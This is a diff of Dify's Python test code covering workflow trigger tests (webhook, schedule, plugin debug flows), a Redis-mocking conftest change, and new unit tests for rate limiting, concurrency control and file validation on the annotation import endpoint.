node_data.update(
{
"method": "POST",
"content_type": "application/json",
"headers": [],
"params": [],
"body": [],
}
)
graph = {
"nodes": [
{"id": root_node_id, "data": node_data},
{"id": "answer-1", "data": {"type": NodeType.ANSWER.value, "title": "answer"}},
],
"edges": [{"source": root_node_id, "target": "answer-1", "sourceHandle": "success"}],
}
return json.dumps(graph)
def test_publish_blocks_start_and_trigger_coexistence(
db_session_with_containers: Session,
tenant_and_account: tuple[Tenant, Account],
app_model: App,
monkeypatch: pytest.MonkeyPatch,
) -> None:
"""Publishing should fail when both start and trigger nodes coexist."""
tenant, account = tenant_and_account
graph = {
"nodes": [
{"id": "start", "data": {"type": NodeType.START.value}},
{"id": "trig", "data": {"type": NodeType.TRIGGER_WEBHOOK.value}},
],
"edges": [],
}
draft_workflow = Workflow.new(
tenant_id=tenant.id,
app_id=app_model.id,
type="workflow",
version=Workflow.VERSION_DRAFT,
graph=json.dumps(graph),
features=json.dumps({}),
created_by=account.id,
environment_variables=[],
conversation_variables=[],
rag_pipeline_variables=[],
)
db_session_with_containers.add(draft_workflow)
db_session_with_containers.commit()
workflow_service = WorkflowService()
monkeypatch.setattr(
feature_service_module.FeatureService,
"get_system_features",
classmethod(lambda _cls: SimpleNamespace(plugin_manager=SimpleNamespace(enabled=False))),
)
monkeypatch.setattr("services.workflow_service.dify_config", SimpleNamespace(BILLING_ENABLED=False))
with pytest.raises(ValueError, match="Start node and trigger nodes cannot coexist"):
workflow_service.publish_workflow(session=db_session_with_containers, app_model=app_model, account=account)
def test_trigger_url_uses_config_base(monkeypatch: pytest.MonkeyPatch) -> None:
"""TRIGGER_URL config should be reflected in generated webhook and plugin endpoints."""
original_url = getattr(dify_config, "TRIGGER_URL", None)
try:
monkeypatch.setattr(dify_config, "TRIGGER_URL", TEST_TRIGGER_URL)
endpoint_module = importlib.reload(importlib.import_module("core.trigger.utils.endpoint"))
assert (
endpoint_module.generate_webhook_trigger_endpoint(WEBHOOK_ID_PRODUCTION)
== f"{TEST_TRIGGER_URL}/triggers/webhook/{WEBHOOK_ID_PRODUCTION}"
)
assert (
endpoint_module.generate_webhook_trigger_endpoint(WEBHOOK_ID_PRODUCTION, True)
== f"{TEST_TRIGGER_URL}/triggers/webhook-debug/{WEBHOOK_ID_PRODUCTION}"
)
assert (
endpoint_module.generate_plugin_trigger_endpoint_url("end-1") == f"{TEST_TRIGGER_URL}/triggers/plugin/end-1"
)
finally:
# Restore original config and reload module
if original_url is not None:
monkeypatch.setattr(dify_config, "TRIGGER_URL", original_url)
importlib.reload(importlib.import_module("core.trigger.utils.endpoint"))
def test_webhook_trigger_creates_trigger_log(
test_client_with_containers: FlaskClient,
db_session_with_containers: Session,
tenant_and_account: tuple[Tenant, Account],
app_model: App,
monkeypatch: pytest.MonkeyPatch,
) -> None:
"""Production webhook trigger should create a trigger log in the database."""
tenant, account = tenant_and_account
webhook_node_id = "webhook-node"
graph_json = _build_workflow_graph(webhook_node_id, NodeType.TRIGGER_WEBHOOK)
published_workflow = Workflow.new(
tenant_id=tenant.id,
app_id=app_model.id,
type="workflow",
version=Workflow.version_from_datetime(naive_utc_now()),
graph=graph_json,
features=json.dumps({}),
created_by=account.id,
environment_variables=[],
conversation_variables=[],
rag_pipeline_variables=[],
)
db_session_with_containers.add(published_workflow)
app_model.workflow_id = published_workflow.id
db_session_with_containers.commit()
webhook_trigger = WorkflowWebhookTrigger(
app_id=app_model.id,
node_id=webhook_node_id,
tenant_id=tenant.id,
webhook_id=WEBHOOK_ID_PRODUCTION,
created_by=account.id,
)
app_trigger = AppTrigger(
tenant_id=tenant.id,
app_id=app_model.id,
node_id=webhook_node_id,
trigger_type=AppTriggerType.TRIGGER_WEBHOOK,
status=AppTriggerStatus.ENABLED,
title="webhook",
)
db_session_with_containers.add_all([webhook_trigger, app_trigger])
db_session_with_containers.commit()
def _fake_trigger_workflow_async(session: Session, user: Any, trigger_data: Any) -> SimpleNamespace:
log = WorkflowTriggerLog(
tenant_id=trigger_data.tenant_id,
app_id=trigger_data.app_id,
workflow_id=trigger_data.workflow_id,
root_node_id=trigger_data.root_node_id,
trigger_metadata=trigger_data.trigger_metadata.model_dump_json() if trigger_data.trigger_metadata else "{}",
trigger_type=trigger_data.trigger_type,
workflow_run_id=None,
outputs=None,
trigger_data=trigger_data.model_dump_json(),
inputs=json.dumps(dict(trigger_data.inputs)),
status=WorkflowTriggerStatus.SUCCEEDED,
error="",
queue_name="triggered_workflow_dispatcher",
celery_task_id="celery-test",
created_by_role=CreatorUserRole.ACCOUNT,
created_by=account.id,
)
session.add(log)
session.commit()
return SimpleNamespace(workflow_trigger_log_id=log.id, task_id=None, status="queued", queue="test")
monkeypatch.setattr(
webhook_service.AsyncWorkflowService,
"trigger_workflow_async",
_fake_trigger_workflow_async,
)
response = test_client_with_containers.post(f"/triggers/webhook/{webhook_trigger.webhook_id}", json={"foo": "bar"})
assert response.status_code == 200
db_session_with_containers.expire_all()
logs = db_session_with_containers.query(WorkflowTriggerLog).filter_by(app_id=app_model.id).all()
assert logs, "Webhook trigger should create trigger log"
@pytest.mark.parametrize("schedule_type", ["visual", "cron"])
def test_schedule_poll_dispatches_due_plan(
db_session_with_containers: Session,
tenant_and_account: tuple[Tenant, Account],
app_model: App,
mock_celery_group: MockCeleryGroup,
mock_celery_signature: MockCelerySignature,
monkeypatch: pytest.MonkeyPatch,
schedule_type: str,
) -> None:
"""Schedule plans (both visual and cron) should be polled and dispatched when due."""
tenant, _ = tenant_and_account
app_trigger = AppTrigger(
tenant_id=tenant.id,
app_id=app_model.id,
node_id=f"schedule-{schedule_type}",
trigger_type=AppTriggerType.TRIGGER_SCHEDULE,
status=AppTriggerStatus.ENABLED,
title=f"schedule-{schedule_type}",
)
plan = WorkflowSchedulePlan(
app_id=app_model.id,
node_id=f"schedule-{schedule_type}",
tenant_id=tenant.id,
cron_expression="* * * * *",
timezone="UTC",
next_run_at=naive_utc_now() - timedelta(minutes=1),
)
db_session_with_containers.add_all([app_trigger, plan])
db_session_with_containers.commit()
next_time = naive_utc_now() + timedelta(hours=1)
monkeypatch.setattr(workflow_schedule_task, "calculate_next_run_at", lambda *_args, **_kwargs: next_time)
monkeypatch.setattr(workflow_schedule_task, "group", mock_celery_group)
monkeypatch.setattr(workflow_schedule_task, "run_schedule_trigger", mock_celery_signature)
poll_workflow_schedules()
assert mock_celery_group.collected, f"Should dispatch signatures for due {schedule_type} schedules"
scheduled_ids = {sig["schedule_id"] for sig in mock_celery_group.collected}
assert plan.id in scheduled_ids
def test_schedule_visual_debug_poll_generates_event(monkeypatch: pytest.MonkeyPatch) -> None:
"""Visual mode schedule node should generate event in single-step debug."""
base_now = naive_utc_now()
monkeypatch.setattr(event_selectors, "naive_utc_now", lambda: base_now)
monkeypatch.setattr(
event_selectors,
"calculate_next_run_at",
lambda *_args, **_kwargs: base_now - timedelta(minutes=1),
)
node_config = {
"id": "schedule-visual",
"data": {
"type": NodeType.TRIGGER_SCHEDULE.value,
"mode": "visual",
"frequency": "daily",
"visual_config": {"time": "3:00 PM"},
"timezone": "UTC",
},
}
poller = event_selectors.ScheduleTriggerDebugEventPoller(
tenant_id="tenant",
user_id="user",
app_id="app",
node_config=node_config,
node_id="schedule-visual",
)
event = poller.poll()
assert event is not None
assert event.workflow_args["inputs"] == {}
def test_plugin_trigger_dispatches_and_debug_events(
test_client_with_containers: FlaskClient,
mock_plugin_subscription: MockPluginSubscription,
monkeypatch: pytest.MonkeyPatch,
) -> None:
"""Plugin trigger endpoint should dispatch events and generate debug events."""
endpoint_id = "1cc7fa12-3f7b-4f6a-9c8d-1234567890ab"
debug_events: list[dict[str, Any]] = []
dispatched_payloads: list[dict[str, Any]] = []
def _fake_process_endpoint(_endpoint_id: str, _request: Any) -> Response:
dispatch_data = {
"user_id": "end-user",
"tenant_id": mock_plugin_subscription.tenant_id,
"endpoint_id": _endpoint_id,
"provider_id": mock_plugin_subscription.provider_id,
"subscription_id": mock_plugin_subscription.id,
"timestamp": int(time.time()),
"events": ["created", "updated"],
"request_id": f"req-{_endpoint_id}",
}
trigger_processing_tasks.dispatch_triggered_workflows_async.delay(dispatch_data)
return Response("ok", status=202)
monkeypatch.setattr(
"services.trigger.trigger_service.TriggerService.process_endpoint",
staticmethod(_fake_process_endpoint),
)
monkeypatch.setattr(
trigger_processing_tasks.TriggerDebugEventBus,
"dispatch",
staticmethod(lambda **kwargs: debug_events.append(kwargs) or 1),
)
def _fake_delay(dispatch_data: dict[str, Any]) -> None:
dispatched_payloads.append(dispatch_data)
trigger_processing_tasks.dispatch_trigger_debug_event(
events=dispatch_data["events"],
user_id=dispatch_data["user_id"],
timestamp=dispatch_data["timestamp"],
request_id=dispatch_data["request_id"],
subscription=mock_plugin_subscription,
)
monkeypatch.setattr(
trigger_processing_tasks.dispatch_triggered_workflows_async,
"delay",
staticmethod(_fake_delay),
)
response = test_client_with_containers.post(f"/triggers/plugin/{endpoint_id}", json={"hello": "world"})
assert response.status_code == 202
assert dispatched_payloads, "Plugin trigger should enqueue workflow dispatch payload"
assert debug_events, "Plugin trigger should dispatch debug events"
dispatched_event_names = {event["event"].name for event in debug_events}
assert dispatched_event_names == {"created", "updated"}
def test_webhook_debug_dispatches_event(
test_client_with_containers: FlaskClient,
db_session_with_containers: Session,
tenant_and_account: tuple[Tenant, Account],
app_model: App,
monkeypatch: pytest.MonkeyPatch,
) -> None:
"""Webhook single-step debug should dispatch debug event and be pollable."""
tenant, account = tenant_and_account
webhook_node_id = "webhook-debug-node"
graph_json = _build_workflow_graph(webhook_node_id, NodeType.TRIGGER_WEBHOOK)
draft_workflow = Workflow.new(
tenant_id=tenant.id,
app_id=app_model.id,
type="workflow",
version=Workflow.VERSION_DRAFT,
graph=graph_json,
features=json.dumps({}),
created_by=account.id,
environment_variables=[],
conversation_variables=[],
rag_pipeline_variables=[],
)
db_session_with_containers.add(draft_workflow)
db_session_with_containers.commit()
webhook_trigger = WorkflowWebhookTrigger(
app_id=app_model.id,
node_id=webhook_node_id,
tenant_id=tenant.id,
webhook_id=WEBHOOK_ID_DEBUG,
created_by=account.id,
)
db_session_with_containers.add(webhook_trigger)
db_session_with_containers.commit()
debug_events: list[dict[str, Any]] = []
original_dispatch = TriggerDebugEventBus.dispatch
monkeypatch.setattr(
"controllers.trigger.webhook.TriggerDebugEventBus.dispatch",
lambda **kwargs: (debug_events.append(kwargs), original_dispatch(**kwargs))[1],
)
# Listener polls first to enter waiting pool
poller = WebhookTriggerDebugEventPoller(
tenant_id=tenant.id,
user_id=account.id,
app_id=app_model.id,
node_config=draft_workflow.get_node_config_by_id(webhook_node_id),
node_id=webhook_node_id,
)
assert poller.poll() is None
response = test_client_with_containers.post(
f"/triggers/webhook-debug/{webhook_trigger.webhook_id}",
json={"foo": "bar"},
headers={"Content-Type": "application/json"},
)
assert response.status_code == 200
assert debug_events, "Debug event should be sent to event bus"
# Second poll should get the event
event = poller.poll()
assert event is not None
assert event.workflow_args["inputs"]["webhook_body"]["foo"] == "bar"
assert debug_events[0]["pool_key"].endswith(f":{app_model.id}:{webhook_node_id}")
def test_plugin_single_step_debug_flow(
flask_app_with_containers: Flask,
monkeypatch: pytest.MonkeyPatch,
) -> None:
"""Plugin single-step debug: listen -> dispatch event -> poller receives and returns variables."""
tenant_id = "tenant-1"
app_id = "app-1"
user_id = "user-1"
node_id = "plugin-node"
provider_id = "langgenius/provider-1/provider-1"
node_config = {
"id": node_id,
"data": {
"type": NodeType.TRIGGER_PLUGIN.value,
"title": "plugin",
"plugin_id": "plugin-1",
"plugin_unique_identifier": "plugin-1",
"provider_id": provider_id,
"event_name": "created",
"subscription_id": "sub-1",
"parameters": {},
},
}
# Start listening
poller = PluginTriggerDebugEventPoller(
tenant_id=tenant_id,
user_id=user_id,
app_id=app_id,
node_config=node_config,
node_id=node_id,
)
assert poller.poll() is None
from core.trigger.debug.events import build_plugin_pool_key
pool_key = build_plugin_pool_key(
tenant_id=tenant_id,
provider_id=provider_id,
subscription_id="sub-1",
name="created",
)
TriggerDebugEventBus.dispatch(
tenant_id=tenant_id,
event=PluginTriggerDebugEvent(
timestamp=int(time.time()),
user_id=user_id,
name="created",
request_id="req-1",
subscription_id="sub-1",
provider_id="provider-1",
),
pool_key=pool_key,
)
from core.plugin.entities.request import TriggerInvokeEventResponse
monkeypatch.setattr(
"services.trigger.trigger_service.TriggerService.invoke_trigger_event",
staticmethod(
lambda **_kwargs: TriggerInvokeEventResponse(
variables={"echo": "pong"},
cancelled=False,
)
),
)
event = poller.poll()
assert event is not None
assert event.workflow_args["inputs"]["echo"] == "pong"
def test_schedule_trigger_creates_trigger_log(
db_session_with_containers: Session,
tenant_and_account: tuple[Tenant, Account],
app_model: App,
monkeypatch: pytest.MonkeyPatch,
) -> None:
"""Schedule trigger execution should create WorkflowTriggerLog in database."""
from tasks import workflow_schedule_tasks
tenant, account = tenant_and_account
# Create published workflow with schedule trigger node
schedule_node_id = "schedule-node"
graph = {
"nodes": [
{
"id": schedule_node_id,
"data": {
"type": NodeType.TRIGGER_SCHEDULE.value,
"title": "schedule",
"mode": "cron",
"cron_expression": "0 9 * * *",
"timezone": "UTC",
},
},
{"id": "answer-1", "data": {"type": NodeType.ANSWER.value, "title": "answer"}},
],
"edges": [{"source": schedule_node_id, "target": "answer-1", "sourceHandle": "success"}],
}
published_workflow = Workflow.new(
tenant_id=tenant.id,
app_id=app_model.id,
type="workflow",
version=Workflow.version_from_datetime(naive_utc_now()),
graph=json.dumps(graph),
features=json.dumps({}),
created_by=account.id,
environment_variables=[],
conversation_variables=[],
rag_pipeline_variables=[],
)
db_session_with_containers.add(published_workflow)
app_model.workflow_id = published_workflow.id
db_session_with_containers.commit()
# Create schedule plan
plan = WorkflowSchedulePlan(
app_id=app_model.id,
node_id=schedule_node_id,
tenant_id=tenant.id,
cron_expression="0 9 * * *",
timezone="UTC",
next_run_at=naive_utc_now() - timedelta(minutes=1),
)
app_trigger = AppTrigger(
tenant_id=tenant.id,
app_id=app_model.id,
node_id=schedule_node_id,
trigger_type=AppTriggerType.TRIGGER_SCHEDULE,
status=AppTriggerStatus.ENABLED,
title="schedule",
)
db_session_with_containers.add_all([plan, app_trigger])
db_session_with_containers.commit()
# Mock AsyncWorkflowService to create WorkflowTriggerLog
def _fake_trigger_workflow_async(session: Session, user: Any, trigger_data: Any) -> SimpleNamespace:
log = WorkflowTriggerLog(
tenant_id=trigger_data.tenant_id,
app_id=trigger_data.app_id,
workflow_id=published_workflow.id,
root_node_id=trigger_data.root_node_id,
trigger_metadata="{}",
trigger_type=AppTriggerType.TRIGGER_SCHEDULE,
workflow_run_id=None,
outputs=None,
trigger_data=trigger_data.model_dump_json(),
inputs=json.dumps(dict(trigger_data.inputs)),
status=WorkflowTriggerStatus.SUCCEEDED,
error="",
queue_name="schedule_executor",
celery_task_id="celery-schedule-test",
created_by_role=CreatorUserRole.ACCOUNT,
created_by=account.id,
)
session.add(log)
session.commit()
return SimpleNamespace(workflow_trigger_log_id=log.id, task_id=None, status="queued", queue="test")
monkeypatch.setattr(
workflow_schedule_tasks.AsyncWorkflowService,
"trigger_workflow_async",
_fake_trigger_workflow_async,
)
# Mock quota to avoid rate limiting
from enums import quota_type
monkeypatch.setattr(quota_type.QuotaType.TRIGGER, "consume", lambda _tenant_id: quota_type.unlimited())
# Execute schedule trigger
workflow_schedule_tasks.run_schedule_trigger(plan.id)
# Verify WorkflowTriggerLog was created
db_session_with_containers.expire_all()
logs = db_session_with_containers.query(WorkflowTriggerLog).filter_by(app_id=app_model.id).all()
assert logs, "Schedule trigger should create WorkflowTriggerLog"
assert logs[0].trigger_type == AppTriggerType.TRIGGER_SCHEDULE
assert logs[0].root_node_id == schedule_node_id
@pytest.mark.parametrize(
("mode", "frequency", "visual_config", "cron_expression", "expected_cron"),
[
# Visual mode: hourly
("visual", "hourly", {"on_minute": 30}, None, "30 * * * *"),
# Visual mode: daily
("visual", "daily", {"time": "3:00 PM"}, None, "0 15 * * *"),
# Visual mode: weekly
("visual", "weekly", {"time": "9:00 AM", "weekdays": ["mon", "wed", "fri"]}, None, "0 9 * * 1,3,5"),
# Visual mode: monthly
("visual", "monthly", {"time": "10:30 AM", "monthly_days": [1, 15]}, None, "30 10 1,15 * *"),
# Cron mode: direct expression
("cron", None, None, "*/5 * * * *", "*/5 * * * *"),
],
)
def test_schedule_visual_cron_conversion(
mode: str,
frequency: str | None,
visual_config: dict[str, Any] | None,
cron_expression: str | None,
expected_cron: str,
) -> None:
"""Schedule visual config should correctly convert to cron expression."""
node_config: dict[str, Any] = {
"id": "schedule-node",
"data": {
"type": NodeType.TRIGGER_SCHEDULE.value,
"mode": mode,
"timezone": "UTC",
},
}
if mode == "visual":
node_config["data"]["frequency"] = frequency
node_config["data"]["visual_config"] = visual_config
else:
node_config["data"]["cron_expression"] = cron_expression
config = ScheduleService.to_schedule_config(node_config)
assert config.cron_expression == expected_cron, f"Expected {expected_cron}, got {config.cron_expression}"
assert config.timezone == "UTC"
assert config.node_id == "schedule-node"
def test_plugin_trigger_full_chain_with_db_verification(
test_client_with_containers: FlaskClient,
db_session_with_containers: Session,
tenant_and_account: tuple[Tenant, Account],
app_model: App,
monkeypatch: pytest.MonkeyPatch,
) -> None:
"""Plugin trigger should create WorkflowTriggerLog and WorkflowPluginTrigger records."""
tenant, account = tenant_and_account
# Create published workflow with plugin trigger node
plugin_node_id = "plugin-trigger-node"
provider_id = "langgenius/test-provider/test-provider"
subscription_id = "sub-plugin-test"
endpoint_id = "2cc7fa12-3f7b-4f6a-9c8d-1234567890ab"
graph = {
"nodes": [
{
"id": plugin_node_id,
"data": {
"type": NodeType.TRIGGER_PLUGIN.value,
"title": "plugin",
"plugin_id": "test-plugin",
"plugin_unique_identifier": "test-plugin",
"provider_id": provider_id,
"event_name": "test_event",
"subscription_id": subscription_id,
"parameters": {},
},
},
{"id": "answer-1", "data": {"type": NodeType.ANSWER.value, "title": "answer"}},
],
"edges": [{"source": plugin_node_id, "target": "answer-1", "sourceHandle": "success"}],
}
published_workflow = Workflow.new(
tenant_id=tenant.id,
app_id=app_model.id,
type="workflow",
version=Workflow.version_from_datetime(naive_utc_now()),
graph=json.dumps(graph),
features=json.dumps({}),
created_by=account.id,
environment_variables=[],
conversation_variables=[],
rag_pipeline_variables=[],
)
db_session_with_containers.add(published_workflow)
app_model.workflow_id = published_workflow.id
db_session_with_containers.commit()
# Create trigger subscription
subscription = TriggerSubscription(
name="test-subscription",
tenant_id=tenant.id,
user_id=account.id,
provider_id=provider_id,
endpoint_id=endpoint_id,
parameters={},
properties={},
credentials={"token": "test-secret"},
credential_type="api-key",
)
db_session_with_containers.add(subscription)
db_session_with_containers.commit()
# Update subscription_id to match the created subscription
graph["nodes"][0]["data"]["subscription_id"] = subscription.id
published_workflow.graph = json.dumps(graph)
db_session_with_containers.commit()
# Create WorkflowPluginTrigger
plugin_trigger = WorkflowPluginTrigger(
app_id=app_model.id,
tenant_id=tenant.id,
node_id=plugin_node_id,
provider_id=provider_id,
event_name="test_event",
subscription_id=subscription.id,
)
app_trigger = AppTrigger(
tenant_id=tenant.id,
app_id=app_model.id,
node_id=plugin_node_id,
trigger_type=AppTriggerType.TRIGGER_PLUGIN,
status=AppTriggerStatus.ENABLED,
title="plugin",
)
db_session_with_containers.add_all([plugin_trigger, app_trigger])
db_session_with_containers.commit()
# Track dispatched data
dispatched_data: list[dict[str, Any]] = []
def _fake_process_endpoint(_endpoint_id: str, _request: Any) -> Response:
dispatch_data = {
"user_id": "end-user",
"tenant_id": tenant.id,
"endpoint_id": _endpoint_id,
"provider_id": provider_id,
"subscription_id": subscription.id,
"timestamp": int(time.time()),
"events": ["test_event"],
"request_id": f"req-{_endpoint_id}",
}
dispatched_data.append(dispatch_data)
return Response("ok", status=202)
monkeypatch.setattr(
"services.trigger.trigger_service.TriggerService.process_endpoint",
staticmethod(_fake_process_endpoint),
)
response = test_client_with_containers.post(f"/triggers/plugin/{endpoint_id}", json={"test": "data"})
assert response.status_code == 202
assert dispatched_data, "Plugin trigger should dispatch event data"
assert dispatched_data[0]["subscription_id"] == subscription.id
assert dispatched_data[0]["events"] == ["test_event"]
# Verify database records exist
db_session_with_containers.expire_all()
plugin_triggers = (
db_session_with_containers.query(WorkflowPluginTrigger)
.filter_by(app_id=app_model.id, node_id=plugin_node_id)
.all()
)
assert plugin_triggers, "WorkflowPluginTrigger record should exist"
assert plugin_triggers[0].provider_id == provider_id
assert plugin_triggers[0].event_name == "test_event"
def test_plugin_debug_via_http_endpoint(
test_client_with_containers: FlaskClient,
db_session_with_containers: Session,
tenant_and_account: tuple[Tenant, Account],
app_model: App,
monkeypatch: pytest.MonkeyPatch,
) -> None:
"""Plugin single-step debug via HTTP endpoint should dispatch debug event and be pollable."""
tenant, account = tenant_and_account
provider_id = "langgenius/debug-provider/debug-provider"
endpoint_id = "3cc7fa12-3f7b-4f6a-9c8d-1234567890ab"
event_name = "debug_event"
# Create subscription
subscription = TriggerSubscription(
name="debug-subscription",
tenant_id=tenant.id,
user_id=account.id,
provider_id=provider_id,
endpoint_id=endpoint_id,
parameters={},
properties={},
credentials={"token": "debug-secret"},
credential_type="api-key",
)
db_session_with_containers.add(subscription)
db_session_with_containers.commit()
# Create plugin trigger node config
node_id = "plugin-debug-node"
node_config = {
"id": node_id,
"data": {
"type": NodeType.TRIGGER_PLUGIN.value,
"title": "plugin-debug",
"plugin_id": "debug-plugin",
"plugin_unique_identifier": "debug-plugin",
"provider_id": provider_id,
"event_name": event_name,
"subscription_id": subscription.id,
"parameters": {},
},
}
# Start listening with poller
poller = PluginTriggerDebugEventPoller(
tenant_id=tenant.id,
user_id=account.id,
app_id=app_model.id,
node_config=node_config,
node_id=node_id,
)
assert poller.poll() is None, "First poll should return None (waiting)"
# Track debug events dispatched
debug_events: list[dict[str, Any]] = []
original_dispatch = TriggerDebugEventBus.dispatch
def _tracking_dispatch(**kwargs: Any) -> int:
debug_events.append(kwargs)
return original_dispatch(**kwargs)
monkeypatch.setattr(TriggerDebugEventBus, "dispatch", staticmethod(_tracking_dispatch))
# Mock process_endpoint to trigger debug event dispatch
def _fake_process_endpoint(_endpoint_id: str, _request: Any) -> Response:
# Simulate what happens inside process_endpoint + dispatch_triggered_workflows_async
pool_key = build_plugin_pool_key(
tenant_id=tenant.id,
provider_id=provider_id,
subscription_id=subscription.id,
name=event_name,
)
TriggerDebugEventBus.dispatch(
tenant_id=tenant.id,
event=PluginTriggerDebugEvent(
timestamp=int(time.time()),
user_id="end-user",
name=event_name,
request_id=f"req-{_endpoint_id}",
subscription_id=subscription.id,
provider_id=provider_id,
),
pool_key=pool_key,
)
return Response("ok", status=202)
monkeypatch.setattr(
"services.trigger.trigger_service.TriggerService.process_endpoint",
staticmethod(_fake_process_endpoint),
)
# Call HTTP endpoint
response = test_client_with_containers.post(f"/triggers/plugin/{endpoint_id}", json={"debug": "payload"})
assert response.status_code == 202
assert debug_events, "Debug event should be dispatched via HTTP endpoint"
assert debug_events[0]["event"].name == event_name
# Mock invoke_trigger_event for poller
monkeypatch.setattr(
"services.trigger.trigger_service.TriggerService.invoke_trigger_event",
staticmethod(
lambda **_kwargs: TriggerInvokeEventResponse(
variables={"http_debug": "success"},
cancelled=False,
)
),
)
# Second poll should receive the event
event = poller.poll()
assert event is not None, "Poller should receive debug event after HTTP trigger"
assert event.workflow_args["inputs"]["http_debug"] == "success"

View File

@ -26,16 +26,29 @@ redis_mock.hgetall = MagicMock(return_value={})
redis_mock.hdel = MagicMock()
redis_mock.incr = MagicMock(return_value=1)
# Ensure OpenDAL fs writes to tmp to avoid polluting workspace
os.environ.setdefault("OPENDAL_SCHEME", "fs")
os.environ.setdefault("OPENDAL_FS_ROOT", "/tmp/dify-storage")
os.environ.setdefault("STORAGE_TYPE", "opendal")
# Add the API directory to Python path to ensure proper imports
import sys
sys.path.insert(0, PROJECT_DIR)
# apply the mock to the Redis client in the Flask app
from extensions import ext_redis
redis_patcher = patch.object(ext_redis, "redis_client", redis_mock)
redis_patcher.start()
def _patch_redis_clients_on_loaded_modules():
"""Ensure any module-level redis_client references point to the shared redis_mock."""
import sys
for module in list(sys.modules.values()):
if module is None:
continue
if hasattr(module, "redis_client"):
module.redis_client = redis_mock
@pytest.fixture
@ -49,6 +62,15 @@ def _provide_app_context(app: Flask):
yield
@pytest.fixture(autouse=True)
def _patch_redis_clients():
"""Patch redis_client to MagicMock only for unit test executions."""
with patch.object(ext_redis, "redis_client", redis_mock):
_patch_redis_clients_on_loaded_modules()
yield
@pytest.fixture(autouse=True)
def reset_redis_mock():
"""reset the Redis mock before each test"""
@ -63,3 +85,20 @@ def reset_redis_mock():
redis_mock.hgetall.return_value = {}
redis_mock.hdel.return_value = None
redis_mock.incr.return_value = 1
# Keep any imported modules pointing at the mock between tests
_patch_redis_clients_on_loaded_modules()
@pytest.fixture(autouse=True)
def reset_secret_key():
"""Ensure SECRET_KEY-dependent logic sees an empty config value by default."""
from configs import dify_config
original = dify_config.SECRET_KEY
dify_config.SECRET_KEY = ""
try:
yield
finally:
dify_config.SECRET_KEY = original

View File

@ -0,0 +1,347 @@
"""
Unit tests for annotation import security features.
Tests rate limiting, concurrency control, file validation, and other
security features added to prevent DoS attacks on the annotation import endpoint.
"""
import io
from unittest.mock import MagicMock, patch
import pytest
from pandas.errors import ParserError
from werkzeug.datastructures import FileStorage
from configs import dify_config
class TestAnnotationImportRateLimiting:
"""Test rate limiting for annotation import operations."""
@pytest.fixture
def mock_redis(self):
"""Mock Redis client for testing."""
with patch("controllers.console.wraps.redis_client") as mock:
yield mock
@pytest.fixture
def mock_current_account(self):
"""Mock current account with tenant."""
with patch("controllers.console.wraps.current_account_with_tenant") as mock:
mock.return_value = (MagicMock(id="user_id"), "test_tenant_id")
yield mock
def test_rate_limit_per_minute_enforced(self, mock_redis, mock_current_account):
"""Test that per-minute rate limit is enforced."""
from controllers.console.wraps import annotation_import_rate_limit
# Simulate exceeding per-minute limit
mock_redis.zcard.side_effect = [
dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE + 1, # Minute check
10, # Hour check
]
@annotation_import_rate_limit
def dummy_view():
return "success"
# Should abort with 429
with pytest.raises(Exception) as exc_info:
dummy_view()
# Verify it's a rate limit error
assert "429" in str(exc_info.value) or "Too many" in str(exc_info.value)
def test_rate_limit_per_hour_enforced(self, mock_redis, mock_current_account):
"""Test that per-hour rate limit is enforced."""
from controllers.console.wraps import annotation_import_rate_limit
# Simulate exceeding per-hour limit
mock_redis.zcard.side_effect = [
3, # Minute check (under limit)
dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR + 1, # Hour check (over limit)
]
@annotation_import_rate_limit
def dummy_view():
return "success"
# Should abort with 429
with pytest.raises(Exception) as exc_info:
dummy_view()
assert "429" in str(exc_info.value) or "Too many" in str(exc_info.value)
def test_rate_limit_within_limits_passes(self, mock_redis, mock_current_account):
"""Test that requests within limits are allowed."""
from controllers.console.wraps import annotation_import_rate_limit
# Simulate being under both limits
mock_redis.zcard.return_value = 2
@annotation_import_rate_limit
def dummy_view():
return "success"
# Should succeed
result = dummy_view()
assert result == "success"
# Verify Redis operations were called
assert mock_redis.zadd.called
assert mock_redis.zremrangebyscore.called
class TestAnnotationImportConcurrencyControl:
"""Test concurrency control for annotation import operations."""
@pytest.fixture
def mock_redis(self):
"""Mock Redis client for testing."""
with patch("controllers.console.wraps.redis_client") as mock:
yield mock
@pytest.fixture
def mock_current_account(self):
"""Mock current account with tenant."""
with patch("controllers.console.wraps.current_account_with_tenant") as mock:
mock.return_value = (MagicMock(id="user_id"), "test_tenant_id")
yield mock
def test_concurrency_limit_enforced(self, mock_redis, mock_current_account):
"""Test that concurrent task limit is enforced."""
from controllers.console.wraps import annotation_import_concurrency_limit
# Simulate max concurrent tasks already running
mock_redis.zcard.return_value = dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT
@annotation_import_concurrency_limit
def dummy_view():
return "success"
# Should abort with 429
with pytest.raises(Exception) as exc_info:
dummy_view()
assert "429" in str(exc_info.value) or "concurrent" in str(exc_info.value).lower()
def test_concurrency_within_limit_passes(self, mock_redis, mock_current_account):
"""Test that requests within concurrency limits are allowed."""
from controllers.console.wraps import annotation_import_concurrency_limit
# Simulate being under concurrent task limit
mock_redis.zcard.return_value = 1
@annotation_import_concurrency_limit
def dummy_view():
return "success"
# Should succeed
result = dummy_view()
assert result == "success"
def test_stale_jobs_are_cleaned_up(self, mock_redis, mock_current_account):
"""Test that old/stale job entries are removed."""
from controllers.console.wraps import annotation_import_concurrency_limit
mock_redis.zcard.return_value = 0
@annotation_import_concurrency_limit
def dummy_view():
return "success"
dummy_view()
# Verify cleanup was called
assert mock_redis.zremrangebyscore.called
class TestAnnotationImportFileValidation:
"""Test file validation in annotation import."""
def test_file_size_limit_enforced(self):
"""Test that files exceeding size limit are rejected."""
# Create a file larger than the limit
max_size = dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT * 1024 * 1024
large_content = b"x" * (max_size + 1024) # Exceed by 1KB
file = FileStorage(stream=io.BytesIO(large_content), filename="test.csv", content_type="text/csv")
# Should be rejected in controller
# This would be tested in integration tests with actual endpoint
def test_empty_file_rejected(self):
"""Test that empty files are rejected."""
file = FileStorage(stream=io.BytesIO(b""), filename="test.csv", content_type="text/csv")
# Should be rejected
# This would be tested in integration tests
def test_non_csv_file_rejected(self):
"""Test that non-CSV files are rejected."""
file = FileStorage(stream=io.BytesIO(b"test"), filename="test.txt", content_type="text/plain")
# Should be rejected based on extension
# This would be tested in integration tests
class TestAnnotationImportServiceValidation:
"""Test service layer validation for annotation import."""
@pytest.fixture
def mock_app(self):
